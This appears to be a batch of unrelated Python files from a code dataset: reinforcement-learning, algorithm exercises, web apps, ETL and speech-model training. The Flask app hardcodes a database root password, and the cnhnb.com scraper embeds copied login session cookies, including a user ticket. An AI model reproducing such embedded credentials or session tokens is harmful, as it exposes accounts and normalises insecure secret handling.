state, action, reward, next_state, done):\n # Save experience in replay memory\n self.memory.add(state, action, reward, next_state, done)\n \n # Learn every UPDATE_EVERY time steps.\n self.t_step = (self.t_step + 1) % UPDATE_EVERY\n if self.t_step == 0:\n # If enough samples are available in memory, get random subset and learn\n if len(self.memory) > BATCH_SIZE:\n experiences = self.memory.sample_prioritized(self.e, \n self.alpha,self.beta)\n self.learn(experiences, GAMMA)\n \n \n def act(self, state, eps=0.):\n \"\"\"Returns actions for given state as per current policy.\n \n Params\n ======\n state (array_like): current state\n eps (float): epsilon, for epsilon-greedy action selection\n \"\"\"\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.qnetwork_local.eval() # For Evaluation. Turn Off certain layers, like drop off, normalization....\n with torch.no_grad():\n action_values = self.qnetwork_local(state)\n self.qnetwork_local.train()\n\n # Epsilon-greedy action selection\n if random.random() > eps:\n return np.argmax(action_values.cpu().data.numpy()) # copies the tensor to the CPU and numpy changes the tensor in the memorie to an array\n else:\n return random.choice(np.arange(self.action_size)) \n\n def learn(self, experiences, gamma):\n '''Update value parameters using given batch of experience tuples.\n Params\n ======\n experiences (Tuple[torch.Variable]): tuple of (s, a, r, s', done) tuples \n gamma (float): discount factor\n '''\n states, actions, rewards, next_states, dones, indices, weights = experiences\n \n \"*** YOUR CODE HERE ***\"\n # Double Q-Learning\n next_actions_local = self.qnetwork_local(next_states).detach().max(1)[1].unsqueeze(1)\n\n ## compute and minimize the loss\n Q_targets_next = self.qnetwork_target(next_states).gather(1,next_actions_local).detach()\n # Compute Q targets for current states \n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n # Compute loss\n loss = (Q_expected - Q_targets).pow(2)*weights\n # Compute TD-Error for PER\n priorities = loss.detach().numpy()*1.0 \n \n loss = loss.mean() \n \n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n # PER Update TD-Error\n self.memory.update_priorities(indices, priorities)\n \n self.optimizer.step()\n \n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU) \n \n def soft_update(self, local_model, target_model, tau):\n \"\"\"Soft update model parameters.\n θ_target = τ*θ_local + (1 - τ)*θ_target\n\n Params\n ======\n local_model (PyTorch model): weights will be copied from\n target_model (PyTorch model): weights will be copied to\n tau (float): interpolation parameter \n \"\"\"\n for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n\n \n\nclass ReplayBufferPrioritized():\n '''Fixed-size buffer to store experience tuples with prioritized replay.'''\n # This code part is strongly inspired by this Repository: https://github.com/p-serna/rainbow-dqn/blob/master/dqn_agent.py\n\n def __init__(self, action_size, buffer_size, batch_size, seed):\n '''Initialize a ReplayBuffer with Prioritized replay object.\n Params\n ======\n action_size (int): dimension of each action\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n seed (int): random seed\n '''\n self.action_size = action_size\n self.memory = deque(maxlen=buffer_size) \n self.batch_size = batch_size\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(seed)\n \n self.priorities = deque(maxlen=buffer_size) \n self.max_priority = 1.0\n \n def sample_prioritized(self, e, alpha, beta):\n '''Randomly sample a batch of experiences from memory with priority.'''\n \n # Calculating probabilities for priorities\n tderrors = np.asarray(self.priorities, dtype = np.float32).flatten()\n pis = (np.abs(tderrors)+e)**alpha\n pis = pis/pis.sum() \n \n # Random indices with probabilities pis\n indices = np.random.choice(len(self.memory), size=self.batch_size, p = pis)\n \n # Selecting episodes from memory\n states = torch.from_numpy(np.vstack([self.memory[idx].state for idx in indices])).float().to(device)\n actions = torch.from_numpy(np.vstack([self.memory[idx].action for idx in indices])).long().to(device)\n rewards = torch.from_numpy(np.vstack([self.memory[idx].reward for idx in indices])).float().to(device)\n next_states = torch.from_numpy(np.vstack([self.memory[idx].next_state for idx in indices])).float().to(device)\n dones = torch.from_numpy(np.vstack([self.memory[idx].done for idx in indices]).astype(np.uint8)).float().to(device)\n \n # Importance sampling \n weights = 1.0/(len(tderrors)*pis[indices])**(beta)\n # Reshape is needed because the flattening at the beginning screw dimensions\n weights = (weights/weights.max()).reshape(weights.shape[0],1)\n weights = torch.from_numpy(weights).float().to(device)\n \n \n return (states, actions, rewards, next_states, dones, indices, weights)\n \n def __len__(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory) \n \n def add(self, state, action, reward, next_state, done):\n '''Add a new experience to memory.'''\n \n e = self.experience(state, action, reward, next_state, done)\n self.memory.append(e)\n self.priorities.append(self.max_priority) # First income allocated with max Prio so that all incomes are seen at least once\n \n def update_priorities(self, indices, tderrors):\n '''Update priorities array with new tderrors'''\n self.max_priority = np.max([self.max_priority,tderrors.max()])\n for idx, tde in zip(indices,tderrors):\n self.priorities[idx] = tde\n ","repo_name":"DiegelD/Deep-Reinforcement-Learning-ND","sub_path":"p1_navigation/per_agent.py","file_name":"per_agent.py","file_ext":"py","file_size_in_byte":8753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3179432151","text":"# 이항계수2_BOJ11051\n\n# input.txt 열기\nimport sys\nsys.stdin = open('input.txt')\n\n# input 받기\nN, K = map(int, sys.stdin.readline().split()) # 자연수 N과 정수 K를 받는다\n\ncnt = 1 # 계산결과를 저장할 변수를 생성하고\nfor i in range(N, N-K, -1): # N부터 1씩 작아지는 K개의 정수를 반복해서\n cnt *= i # cnt에 곱해주고\nfor j in range(1, K+1): # 1부터 1씩 증가하는 K개의 정수를 반복해서\n cnt //= j # cnt에 나눠준다\n\nprint(cnt % 10007) # 10007로 나눈 나머지를 출력한다","repo_name":"zer0eat/Algorithm","sub_path":"221108_1_이항계수2_BOJ11051/221108_이항계수2_BOJ11051.py","file_name":"221108_이항계수2_BOJ11051.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8731473699","text":"\r\nimport random\r\n\r\nclass Blob:\r\n\r\n colors = ['red','yellow','green' ]\r\n \r\n def __init__(self, name = 0):\r\n \r\n self.blob_color = random.choice(Blob.colors)\r\n self.years = 0\r\n self.alive = True\r\n self.been_dead = None\r\n self.genes = [random.randint(1,10) for _ in range(10)]\r\n self.replicate = [.1, .25, .4][Blob.colors.index(self.blob_color)]\r\n self.name = name\r\n\r\n def age(self,):\r\n\r\n chance_of_death = (100 - sum(self.genes))/100\r\n self.die = random.random()\r\n\r\n if self.alive:\r\n self.years += 1\r\n if self.die < chance_of_death:\r\n self.alive = False\r\n \r\n if not self.alive:\r\n if self.been_dead == None:\r\n self.been_dead = 0\r\n else:\r\n self.been_dead += 1\r\n \r\n \r\n def __str__(self,):\r\n if self.alive == True:\r\n return f'{self.name} is a {self.blob_color} blob. He is currently {self.years} years old.'\r\n else:\r\n return f'{self.name} was a {self.blob_color} blob. He lived to be {self.years} years old and died {self.been_dead} years ago.'\r\n \r\n\r\n\r\n","repo_name":"TylerJAndrews/Python","sub_path":"Blobpath/blob.py","file_name":"blob.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20188439241","text":"# 작업(2056)\n# https://www.acmicpc.net/problem/2056\n# 못품(21.09.09)\n\n# from sys import stdin\n# from collections import deque\n\n# def topology_sort():\n# result = []\n# q = deque()\n\n# for i in range(1, N + 1):\n# if indegree[i] == 0:\n# q.append(i)\n# while q:\n# now = q.popleft()\n# # 동시에 작업을 실행할 경우\n# if len(q) >= 1:\n# for idx in q:\n# time[idx] = time[idx] - time[now] \n# if time[idx] < 0:\n# time[idx] = 0 \n# result.append(time[now])\n \n# for i in graph[now]:\n# indegree[i] -= 1\n \n# if indegree[i] == 0:\n# q.append(i)\n# return result\n\n# if __name__ == '__main__':\n# input = stdin.readline\n# N = int(input())\n# res = 0\n# indegree = [0] * (N + 1)\n# graph = [[] for _ in range(N + 1)]\n# time = [0] * (N + 1)\n\n# for i in range(1, N + 1):\n# # 걸리는 시간, 선행 작업들 개수, 선행 관계에 있는 작업들 번호 \n# lst = list(map(int, input().split()))\n# time[i] = lst[0]\n# if lst[1] >= 1:\n# # 진입 차수 만들기\n# indegree[i] += lst[1]\n# tmps = lst[2:]\n# for tmp in tmps:\n# # 그래프 만들기(목적지와, 걸리는 시간) \n# graph[tmp].append(i)\n# print(sum(topology_sort()))\n\nimport sys\ninput = sys.stdin.readline\n\nif __name__ == '__main__':\n N = int(input())\n costs = [0]*(N+1)\n\n for i in range(1, N+1):\n cur_input = list(map(int, input().split()))\n\n prev_max_time = 0\n for j in range(2, 2 + cur_input[1]):\n prev_max_time = max(prev_max_time, costs[cur_input[j]])\n\n costs[i] = prev_max_time + cur_input[0]\n\n print(max(costs))","repo_name":"jongwanra/TIL","sub_path":"python_baekjoon/topological_sorting/2056.py","file_name":"2056.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"8810080871","text":"from flask import *\nimport mysql.connector\nimport ast\napp=Flask(__name__)\napp.config[\"JSON_AS_ASCII\"]=False\napp.config[\"TEMPLATES_AUTO_RELOAD\"]=True\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"12345678\", #demo\n database=\"taipei_day_trip\"\n)\n\n# Pages\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n@app.route(\"/attraction/\")\ndef attraction(id):\n\treturn render_template(\"attraction.html\")\n@app.route(\"/booking\")\ndef booking():\n\treturn render_template(\"booking.html\")\n@app.route(\"/thankyou\")\ndef thankyou():\n\treturn render_template(\"thankyou.html\")\n\n# 旅遊景點API\n@app.route(\"/api/attractions\", methods=[\"GET\"])\ndef get_attractions_info():\n\tpage=request.args.get(\"page\", 0)\n\tpage=int(page)\n\tkeyword=request.args.get(\"keyword\", None)\n\tmycursor = mydb.cursor()\n\ttry:\n\t\tif keyword != None:\n\t\t\toffset=page*12\n\t\t\tsql=\"SELECT * FROM sites WHERE category=%s OR name LIKE %s ORDER BY id LIMIT %s, 12\"\n\t\t\tval=(keyword, \"%\"+keyword+\"%\", offset)\n\t\t\tmycursor.execute(sql, val)\n\t\t\tattractions_info=mycursor.fetchall()\n\t\t\tdata=[\n\t\t\t\t{\n\t\t\t\t\"id\":id,\n\t\t\t\t\"name\":name,\n\t\t\t\t\"category\":category,\n\t\t\t\t\"description\":description,\n\t\t\t\t\"address\":address,\n\t\t\t\t\"transport\":transport,\n\t\t\t\t\"mrt\":mrt,\n\t\t\t\t\"lat\":float(lat),\n\t\t\t\t\"lng\":float(lng),\n\t\t\t\t\"images\":ast.literal_eval(images)\n\t\t\t\t}\n\t\t\t\tfor id, name, category, description, address, transport, mrt, lat, lng, images in attractions_info\n\t\t\t\t]\n\t\t\t#處理nextPage\n\t\t\tsql=\"SELECT COUNT(id) FROM sites WHERE category=%s OR name LIKE %s\"\n\t\t\tval=(keyword, \"%\"+keyword+\"%\")\n\t\t\tmycursor.execute(sql, val)\n\t\t\ttotal_attractions_num=mycursor.fetchone()\n\t\t\ttotal_attractions_num=total_attractions_num[0]\n\t\t\ttotal_pages=total_attractions_num/12\n\t\t\tif page+1 < total_pages:\n\t\t\t\tnextPage=page+1\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\t\t\telif page+1 >= total_pages:\n\t\t\t\tnextPage=None\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\t\telif keyword == None:\n\t\t\toffset=page*12\n\t\t\tsql=\"SELECT * FROM sites ORDER BY id LIMIT %s, 12\"\n\t\t\tval=(offset,)\n\t\t\tmycursor.execute(sql, val)\n\t\t\tattractions_info=mycursor.fetchall()\n\t\t\tdata=[\n\t\t\t\t{\n\t\t\t\t\"id\":id,\n\t\t\t\t\"name\":name,\n\t\t\t\t\"category\":category,\n\t\t\t\t\"description\":description,\n\t\t\t\t\"address\":address,\n\t\t\t\t\"transport\":transport,\n\t\t\t\t\"mrt\":mrt,\n\t\t\t\t\"lat\":float(lat),\n\t\t\t\t\"lng\":float(lng),\n\t\t\t\t\"images\":ast.literal_eval(images)\n\t\t\t\t}\n\t\t\t\tfor id, name, category, description, address, transport, mrt, lat, lng, images in attractions_info\n\t\t\t\t]\n\t\t\t#處理nextPage\n\t\t\tsql=\"SELECT COUNT(id) FROM sites\"\n\t\t\tmycursor.execute(sql)\n\t\t\ttotal_attractions_num=mycursor.fetchone()\n\t\t\ttotal_attractions_num=total_attractions_num[0]\n\t\t\ttotal_pages=total_attractions_num/12\n\t\t\tif page+1 < total_pages:\n\t\t\t\tnextPage=page+1\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\t\t\telif page+1 >= total_pages:\n\t\t\t\tnextPage=None\n\t\t\t\treturn jsonify({\"data\":data, \"nextPage\":nextPage})\n\texcept Exception:\n\t\terr_json_message={\"error\": True, \"message\": \"Server Error\"}\n\t\treturn jsonify(err_json_message)\n\n# 報錯設定\n@app.errorhandler(400)\ndef Bad_request(e):\n return jsonify({\"error\": True, \"message\": \"Bad request\"}), 400\t\n\n# 旅遊景點API\n@app.route(\"/api/attraction/\", methods=[\"GET\"])\ndef get_attractions_byID(attractionID):\n\tmycursor = mydb.cursor()\n\tif str(attractionID).isdigit() is False:\n\t\tabort(400)\n\ttry:\n\t\tif str(attractionID).isdigit() is True:\n\t\t\tsql=\"SELECT * FROM sites WHERE id=%s \"\n\t\t\tval=(attractionID,)\n\t\t\tmycursor.execute(sql, val)\n\t\t\tattraction_info=mycursor.fetchone()\n\t\t\tif attraction_info is None:\n\t\t\t\treturn jsonify({\"data\":None})\n\t\t\telse:\n\t\t\t\tid=attraction_info[0]\n\t\t\t\tname=attraction_info[1]\n\t\t\t\tcategory=attraction_info[2]\n\t\t\t\tdescription=attraction_info[3]\n\t\t\t\taddress=attraction_info[4]\n\t\t\t\ttransport=attraction_info[5]\n\t\t\t\tmrt=attraction_info[6]\n\t\t\t\tlat=float(attraction_info[7])\n\t\t\t\tlng=float(attraction_info[8])\n\t\t\t\timages=ast.literal_eval(attraction_info[9])\n\t\t\t\tdata={\"data\":{\n\t\t\t\t\t\"id\":id,\n\t\t\t\t\t\"name\":name,\n\t\t\t\t\t\"category\":category,\n\t\t\t\t\t\"description\":description,\n\t\t\t\t\t\"address\":address,\n\t\t\t\t\t\"transport\":transport,\n\t\t\t\t\t\"mrt\":mrt,\n\t\t\t\t\t\"lat\":lat,\n\t\t\t\t\t\"lng\":lng,\n\t\t\t\t\t\"images\":images\n\t\t\t\t\t}}\n\t\t\t\treturn jsonify(data)\n\texcept Exception:\n\t\terr_json_message={\"error\": True, \"message\": \"Server Error\"}\n\t\treturn jsonify(err_json_message)\n\n# 旅遊景點分類API\n@app.route(\"/api/categories\", methods=[\"GET\"])\ndef get_attractions_categories():\n\tmycursor = mydb.cursor()\n\ttry:\n\t\tmycursor.execute(\"SELECT DISTINCT category FROM sites\")\n\t\tcategories=mycursor.fetchall()\n\t\tcategory_list=list(map(''.join, categories))\n\t\treturn jsonify({\"data\":category_list})\n\texcept Exception:\n\t\terr_json_message={\"error\": True, \"message\": \"Server Error\"}\n\t\treturn jsonify(err_json_message)\n\n\napp.run(host='0.0.0.0', port=3000)","repo_name":"Chung1178/WeHelp-Stage2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74223408969","text":"class Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n if len(s1) + len(s2) != len(s3):\n return False\n if not s1:\n return s2 == s3\n if not s2:\n return s1 == s3\n\n # Initialize the previous row of the dp array\n prev = [True] + [False] * len(s2)\n\n # Fill in the dp array row by row\n for i in range(1, len(s1) + 1):\n # Initialize the current row of the dp array\n curr = [False] * (len(s2) + 1)\n curr[0] = prev[0] and s1[i - 1] == s3[i - 1]\n\n for j in range(1, len(s2) + 1):\n curr[j] = (prev[j] and s1[i - 1] == s3[i + j - 1]) or (\n curr[j - 1] and s2[j - 1] == s3[i + j - 1]\n )\n\n # Update the previous row\n prev = curr\n\n return prev[-1]\n","repo_name":"proModeLife/InternPrep","sub_path":"Leetcode/Dynamic_Programming/Interleaving_String.py","file_name":"Interleaving_String.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4684323155","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\n\nfrom destination.models import (\n Country, \n Destination,\n Lodging\n)\nfrom users.models import Testimoni\n\nclass Index(TemplateView):\n template_name = 'destination/index.html'\n \n def get(self, request, *args, **kwargs):\n if 'country' in kwargs and not Country.objects.filter(name=kwargs['country'].upper()).exists():\n return redirect('destination:index')\n return render(self.request, self.template_name, self.get_context_data())\n \n def get_context_data(self, **kwargs):\n context = {\n 'destinationActive': 'active',\n 'listCountry': Country.objects.all().order_by('name'),\n 'listTestimoni': Testimoni.objects.filter(is_show=True),\n 'country': None,\n 'place': 'Destinations',\n 'title_blocks_cover': 'Destinations'\n }\n \n if 'country' in kwargs and kwargs['country'] != None:\n context['country'] = kwargs['country']\n country = Country.objects.get(name=kwargs['country'].upper())\n context['listDestination'] = Destination.objects.filter(country=country)\n else:\n context['listDestination'] = Destination.objects.all()\n context['country'] = None\n return context\n \nclass DestinationDetail(TemplateView):\n template_name = 'destination/destinationDetail.html'\n\n def get(self, request, *args, **kwargs):\n if not Destination.objects.filter(country=Country.objects.get(name=kwargs['country'].upper()), slug=kwargs['name']).exists():\n return redirect('destination:index')\n \n destination = Destination.objects.get(country=Country.objects.get(name=kwargs['country'].upper()), slug=kwargs['name'])\n context = self.get_context_data()\n context['destination'] = destination\n context['title_blocks_cover'] = destination.name\n print(len(Lodging.objects.filter(destination=destination)))\n context['listLodging'] = Lodging.objects.filter(destination=destination)\n return render(request, self.template_name, context)\n \n def get_context_data(self, **kwargs):\n \n context = {\n 'place': 'Destination',\n 'destinationActive': 'active',\n 'listCountry': Country.objects.all().order_by('name'),\n }\n return context\n ","repo_name":"zeetec20/travel","sub_path":"destination/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18628936050","text":"import requests\nfrom requests import session\nfrom lxml import etree\nfrom selenium import webdriver\n\n# url = 'https://www.cnhnb.com/p/niurou/'\n# headers = {\n# 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n# 'Accept-Encoding':'gzip, deflate, br',\n# 'Accept-Language':'zh-CN,zh;q=0.9',\n# 'Cache-Control':'max-age=0',\n# 'Connection':'keep-alive',\n# 'Cookie': 'deviceId=5481276-a4eb-4305-852d-1e23fb671; sessionId=S_0KTUSNHQC8YWGM28; Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c=1631954226,1632272070,1632274864,1632282578; hnUserTicket=8468fd4c-c852-4667-a91a-ec43809a192c; hnUserId=883248472; Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c=1632282601',\n# 'Host':'www.cnhnb.com',\n# 'If-None-Match':'\"1f484-ROIISghOjy0EqWeIVe1hQwQwFOk\"',\n# 'Referer':'https://www.cnhnb.com/p/niurou/',\n# 'sec-ch-ua':'\"Google Chrome\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"',\n# 'sec-ch-ua-mobile':'?0',\n# 'sec-ch-ua-platform':'\"Windows\"',\n# 'Sec-Fetch-Dest':'document',\n# 'Sec-Fetch-Mode':'navigate',\n# 'Sec-Fetch-Site':'same-origin',\n# 'Sec-Fetch-User':'?1',\n# 'Upgrade-Insecure-Requests':'1',\n# 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4636.4 Safari/537.36',\n# }\n# session = session()\n# response = session.get(url=url,headers=headers)\n# cookies = response.cookies.get_dict()\n# html = etree.HTML(response.text)\n# urlList = html.xpath('//div[@class=\"supply-item\"]/div/a/@href')\n# print(cookies)\n\n# for per_url in urlList:\n# detail_url = 'https://www.cnhnb.com'+per_url\n#\n# chrome = webdriver.Chrome()\n# chrome.add_cookie()\n\nchrome = webdriver.Chrome()\ncookie_deviceId={'name':'deviceId','value':'b25c886-ff33-4ca9-9977-ee95c47be','domain': 'www.cnhnb.com','path': '/'}\ncookie_Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c={'name':'Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c','value':'1632284099','domain': '.cnhnb.com','path': '/'}\ncookie_Hm_lvt_9aa0ee2c8e00d046f6d1631cf46da4b6={'name':'Hm_lvt_9aa0ee2c8e00d046f6d1631cf46da4b6','value':'1631674382','domain': '.www.cnhnb.com','path': '/'}\ncookie_Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c={'name':'Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c','value':'1631673979,1631674382,1632284074','domain': '.cnhnb.com','path': '/'}\ncookie_Hm_lvt_hnUserId={'name':'hnUserId','value':'883248472','domain': '.cnhnb.com','path': '/'}\ncookie_Hm_lvt_hnUserTicket={'name':'hnUserTicket','value':'fe26ac7d-dae9-48f2-94f0-6405fd0e8bc9','domain': '.cnhnb.com','path': '/'}\ncookie_Hm_lvt_sessionId={'name':'sessionId','value':'S_0KTUZSH7A41OX59O','domain': 'www.cnhnb.com','path': '/'}\n\nchrome.add_cookie(cookie_deviceId)\nchrome.add_cookie(cookie_Hm_lpvt_91cf34f62b9bedb16460ca36cf192f4c)\nchrome.add_cookie(cookie_Hm_lvt_9aa0ee2c8e00d046f6d1631cf46da4b6)\nchrome.add_cookie(cookie_Hm_lvt_91cf34f62b9bedb16460ca36cf192f4c)\nchrome.add_cookie(cookie_Hm_lvt_hnUserId)\nchrome.add_cookie(cookie_Hm_lvt_hnUserTicket)\nchrome.add_cookie(cookie_Hm_lvt_sessionId)\nchrome.get('https://www.cnhnb.com/gongying/6038342/')","repo_name":"CuiXiangTuT/MyProject","sub_path":"WebCrawler/惠农网/惠农网供应大厅.py","file_name":"惠农网供应大厅.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"6830025674","text":"import pandas as pd\nimport requests\nfrom io import BytesIO\nimport gzip\nimport logging\nfrom docs import config\n\n\ndef get_file():\n \"\"\"Grabs the file from the Google drive and loads it into a pandas dataframe. Parses date and time column into timestamp column\n\n Returns\n -------\n df : pandas dataframe\n dataframe that contains all file rows without duplicates\n \"\"\"\n logging.info('Extracting file ...')\n file_id = config.ORIG_URL.split('/')[-2]\n dwn_url = 'https://drive.google.com/uc?export=download&id=' + file_id\n\n response = requests.get(dwn_url)\n if response.status_code != 200:\n logging.error('Error downloading file: {} {}'.format(response.status_code, response.content))\n return None\n else:\n df = open_gzip_read_tsv(BytesIO(response.content))\n\n logging.info('Total number of lines in the file: {}'.format(df.shape[0]))\n df.drop_duplicates(keep='last', inplace=True)\n logging.info('Total number of lines in the file after removing duplicates: {}'.format(df.shape[0]))\n # Added for events_log table PK\n df['raw_event'] = df[['date', 'time', 'user_id', 'url', 'ip', 'user_agent_string']].apply(lambda x: ''.join(x),\n axis=1)\n df['date'] = df['date'] + ' ' + df['time']\n df.rename(columns={'date': 'timestamp'}, inplace=True)\n df['timestamp'] = pd.to_datetime(df['timestamp'], format='%Y-%m-%d %H:%M:%S')\n df.drop(['time'], axis=1, inplace=True)\n\n return df\n\n\ndef open_gzip_read_tsv(bytes_io):\n \"\"\"Opens gzip file and creates pandas dataframe\n\n Parameters\n ----------\n bytes_io : bytes-like object\n response content bytes\n\n Raises\n ------\n IOError\n Error while reading the file.\n\n Returns\n -------\n df : str\n pandas dataframe with the content of the tsv file\n \"\"\"\n try:\n with gzip.open(bytes_io, 'rt') as read_file:\n df = pd.read_csv(read_file, sep='\\t', names=['date', 'time', 'user_id', 'url', 'ip', 'user_agent_string'],\n low_memory=False)\n return df\n except IOError as e:\n print(\"Error reading file: {}\".format(e))\n","repo_name":"TravisClub/etl-system","sub_path":"src/extract_file.py","file_name":"extract_file.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11830294606","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nimport sys\nsys.path.append(\"../tensorflow/tensorflow/examples/speech_commands/\")\nimport input_data\nimport models\nimport numpy as np\nimport pickle\n\nfrom config import *\nif len(sys.argv) != 2:\n print(\"Incorrect number of arguments\")\n sys.exit()\ncmd = sys.argv[1]\n\n# Helper function to run inference\ndef run_tflite_inference_testSet(tflite_model_path, model_type=\"Float\"):\n #\n # Load test data\n #\n np.random.seed(0) # set random seed for reproducible test results.\n with tf.compat.v1.Session() as sess:\n test_data, test_labels = audio_processor.get_data(\n -1, 0, model_settings, BACKGROUND_FREQUENCY, BACKGROUND_VOLUME_RANGE,\n TIME_SHIFT_MS, 'testing', sess\n )\n test_data = np.expand_dims(test_data, axis=1).astype(np.float32)\n\n #\n # Initialize the interpreter\n #\n interpreter = tf.lite.Interpreter(tflite_model_path)\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()[0]\n output_details = interpreter.get_output_details()[0]\n\n #\n # For quantized models, manually qantize the input data from float to integer\n #\n if model_type == \"Quantized\":\n input_scale, input_zero_point = input_details[\"quantization\"]\n test_data = test_data / input_scale + input_zero_point\n test_data = test_data.astype(input_details[\"dtype\"])\n\n #\n # Evaluate the predictions\n #\n correct_predictions = 0\n for i in range(len(test_data)):\n interpreter.set_tensor(input_details[\"index\"], test_data[i])\n interpreter.invoke()\n output = interpreter.get_tensor(output_details[\"index\"])[0]\n top_prediction = output.argmax()\n correct_predictions += (top_prediction == test_labels[i])\n\n print(f\"{model_type} model accuracy is {(correct_predictions * 100) / len(test_data)}% (Number of test samples={len(test_data)})\")\nimport subprocess\nif cmd == \"train\":\n subprocess.run([\"python3\", \"../tensorflow/tensorflow/examples/speech_commands/train.py\",\n f\"--data_dir={DATASET_DIR}\",\n f\"--wanted_words={WANTED_WORDS}\",\n f\"--silence_percentage={SILENT_PERCENTAGE}\",\n f\"--unknown_percentage={UNKNOWN_PERCENTAGE}\",\n f\"--preprocess={PREPROCESS}\",\n f\"--window_stride={WINDOW_STRIDE}\",\n f\"--model_architecture={MODEL_ARCHITECTURE}\",\n f\"--how_many_training_steps={TRAINING_STEPS}\",\n f\"--learning_rate={LEARNING_RATE}\",\n f\"--train_dir={TRAIN_DIR}\",\n f\"--summaries_dir={LOGS_DIR}\",\n f\"--verbosity={VERBOSITY}\",\n f\"--eval_step_interval={EVAL_STEP_INTERVAL}\",\n f\"--save_step_interval={SAVE_STEP_INTERVAL}\"\n ])\n\nif cmd == \"freeze\":\n subprocess.run([\"python3\", \"../tensorflow/tensorflow/examples/speech_commands/freeze.py\",\n f\"--wanted_words={WANTED_WORDS}\",\n f\"--window_stride={WINDOW_STRIDE}\",\n f\"--preprocess={PREPROCESS}\",\n f\"--model_architecture={MODEL_ARCHITECTURE}\",\n f\"--start_checkpoint={TRAIN_DIR}{MODEL_ARCHITECTURE}.ckpt-{TOTAL_STEPS}\",\n f\"--save_format=saved_model\",\n f\"--output_file={SAVED_MODEL}\"\n ])\n\nif cmd == \"convert\":\n subprocess.run([\"xxd\", \"-i\", MODEL_TFLITE, MODEL_TFLITE_MICRO])\n REPLACE_TEXT = MODEL_TFLITE.replace('/', '_').replace('.', '_')\n subprocess.run([\"sed\", \"-i\", f\"s/{REPLACE_TEXT}/g_model/g\", MODEL_TFLITE_MICRO])\n\nif cmd == \"eval\":\n model_settings = models.prepare_model_settings(\n len(input_data.prepare_words_list(WANTED_WORDS.split(','))),\n SAMPLE_RATE, CLIP_DURATION_MS, WINDOW_SIZE_MS,\n WINDOW_STRIDE, FEATURE_BIN_COUNT, PREPROCESS\n )\n audio_processor = input_data.AudioProcessor(\n DATA_URL, DATASET_DIR,\n SILENT_PERCENTAGE, UNKNOWN_PERCENTAGE,\n WANTED_WORDS.split(','), VALIDATION_PERCENTAGE,\n TESTING_PERCENTAGE, model_settings, LOGS_DIR\n )\n\n with tf.compat.v1.Session() as sess:\n float_converter = tf.lite.TFLiteConverter.from_saved_model(SAVED_MODEL)\n float_tflite_model = float_converter.convert()\n float_tflite_model_size = open(FLOAT_MODEL_TFLITE, \"wb\").write(float_tflite_model)\n print(f\"Float model is {float_tflite_model_size} bytes\")\n\n converter = tf.lite.TFLiteConverter.from_saved_model(SAVED_MODEL)\n converter.optimizations = [tf.lite.Optimize.DEFAULT]\n converter.inference_input_type = tf.int8\n converter.inference_output_type = tf.int8\n def representative_dataset_gen():\n for i in range(100):\n data, _ = audio_processor.get_data(1, i*1, model_settings,\n BACKGROUND_FREQUENCY,\n BACKGROUND_VOLUME_RANGE,\n TIME_SHIFT_MS,\n 'testing',\n sess)\n flattened_data = np.array(data.flatten(), dtype=np.float32).reshape(1, 1960)\n yield [flattened_data]\n converter.representative_dataset = representative_dataset_gen\n tflite_model = converter.convert()\n tflite_model_size = open(MODEL_TFLITE, \"wb\").write(tflite_model)\n print(f\"Quantized model is {tflite_model_size} bytes\")\n\n 